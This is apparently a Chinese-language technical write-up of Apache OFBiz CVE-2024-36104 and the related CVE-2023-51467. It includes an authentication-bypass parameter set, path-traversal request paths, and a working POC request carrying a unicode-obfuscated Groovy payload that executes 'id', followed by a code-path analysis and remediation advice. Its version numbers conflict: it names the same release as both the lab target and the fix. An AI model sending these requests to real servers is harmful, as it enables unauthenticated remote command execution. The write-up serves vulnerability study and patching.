Apache OFBiz Groovy代码执行漏洞分析 (CVE-2024-36104)<\/h1>

漏洞概述<\/h2>
Apache OFBiz是一个开源的企业级业务流程开发框架。近期爆出的CVE-2024-36104漏洞允许攻击者通过webtools\/control\/ProgramExport接口执行恶意Groovy代码，从而实现任意命令执行。该漏洞与之前发现的CVE-2024-32113和CVE-2023-51467相关，都是基于对ProgramExport接口的利用。<\/p>

环境搭建<\/h2>

下载OFBiz 18.12.14版本<\/li>
安装Gradle并将项目导入IDEA<\/li>
执行build命令生成ofbiz.jar<\/li>
添加JAR Application并设置JAR路径启动项目<\/li>

访问https:\/\/127.0.0.1:8443\/accounting验证环境是否搭建成功<\/li> <\/ol>

相关漏洞分析<\/h2>

CVE-2023-51467 (鉴权绕过漏洞)<\/h3>

漏洞原理<\/strong>：<\/p>

在org.apache.ofbiz.webapp.control.LoginWorker#checkLogin()<\/code>中<\/li>
提交参数USERNAME=&PASSWORD=&requirePasswordChange=Y<\/code>可绕过登录验证<\/li>
当userLogin==null<\/code>时，程序进入if语句<\/li>
login()<\/code>方法中，如果requirePasswordChange=Y<\/code>则返回"requirePasswordChange"<\/li>
导致checkLogin()<\/code>最终返回"success"从而绕过认证<\/li> <\/ul> 修复方式<\/strong>：<\/p> 18.12.11版本改用UtilValidate.isEmpty()<\/code>判断参数是否为空<\/li> <\/ul> CVE-2024-36104 (路径限制不当漏洞)<\/h3> 漏洞利用方式<\/strong>：<\/p> 通过路径遍历绕过身份验证： POST \/webtools\/control\/forgotPassword\/%2e\/%2e\/ProgramExport <\/code><\/pre> <\/li> 直接访问无需认证的接口： POST \/webtools\/control\/forgotPassword\/ProgramExport <\/code><\/pre> <\/li> <\/ol> POC示例<\/strong>：<\/p> POST<\/span> \/webtools\/control\/forgotPassword\/%2e\/%2e\/ProgramExport HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> x.x.x.x<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 262<\/span> <\/span><\/span> <\/span><\/span>groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b <\/span><\/span><\/code><\/pre>漏洞详细分析<\/h2> 请求处理流程<\/h3> ControlFilter处理<\/strong>：<\/p> 请求首先经过一系列Filter<\/li> 18.14.13版本新增了对特殊字符的过滤，但仍有绕过可能<\/li> <\/ul> <\/li> ControlServlet处理<\/strong>：<\/p> doGet()<\/code>方法进行请求预处理<\/li> 获取用户session信息和设置响应头<\/li> 进入RequestHandler.doRequest()<\/code><\/li> <\/ul> <\/li> RequestHandler处理<\/strong>：<\/p> 解析WEB-INF\/common-controller.xml配置文件<\/li> 获取request-map标签信息，特别是security标签中的auth值<\/li> forgotPassword<\/code>接口的auth=false<\/code>（无需认证）<\/li> <\/ul> <\/li> 请求URI处理<\/strong>：<\/p> 通过getRequestUri()<\/code>从path中提取第一个路径段（如forgotPassword）<\/li> 使用getOverrideViewUri()<\/code>获取实际要调用的接口（如ProgramExport）<\/li> <\/ul> <\/li> 认证绕过<\/strong>：<\/p> 由于requestUri是forgotPassword，requestMap.securityAuth<\/code>为False<\/li> 跳过checkLogin()<\/code>的身份验证<\/li> <\/ul> <\/li> 视图渲染<\/strong>：<\/p> 当nextRequestResponse.type=view<\/code>时进入renderView()<\/code><\/li> 使用之前获取的overrideViewUri<\/code>（ProgramExport）处理业务逻辑<\/li> <\/ul> <\/li> <\/ol> 关键代码分析<\/h3> 路径处理<\/strong>：<\/p> \/\/ 获取请求URI <\/span><\/span><\/span><\/span>String requestUri =<\/span> getRequestUri(<\/span>path);<\/span> <\/span><\/span>\/\/ 获取要覆盖的视图URI <\/span><\/span><\/span><\/span>String overrideViewUri =<\/span> getOverrideViewUri(<\/span>path,<\/span> requestUri);<\/span> <\/span><\/span><\/code><\/pre><\/li> 认证检查<\/strong>：<\/p> if<\/span> (<\/span>requestMap.<\/span>securityAuth<\/span>)<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>runEvent<\/span>(<\/span>request,<\/span> response,<\/span> checkLoginEvent,<\/span> null<\/span>,<\/span> "security-auth"<\/span>);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 视图渲染<\/strong>：<\/p> if<\/span> (<\/span>"view"<\/span>.<\/span>equals<\/span>(<\/span>nextRequestResponse.<\/span>type<\/span>))<\/span> {<\/span> <\/span><\/span> renderView(<\/span>nextRequestResponse,<\/span> request,<\/span> response);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 修复方案<\/h2> 升级到最新版本（18.12.14及以上）<\/li> 在ControlFilter中添加对特殊字符（如;<\/code>和%2e<\/code>）的过滤<\/li> 加强对ProgramExport接口的访问控制<\/li> 对所有敏感接口实施严格的权限验证<\/li> <\/ol> 总结<\/h2> CVE-2024-36104漏洞的核心在于：<\/p> ProgramExport接口允许执行Groovy代码<\/li> 通过路径处理逻辑可以绕过身份验证<\/li> 结合无需认证的接口（如forgotPassword）实现RCE<\/li> <\/ol> 建议用户及时升级并检查系统中是否存在类似的路径处理问题，对所有执行代码的接口实施严格的访问控制。<\/p>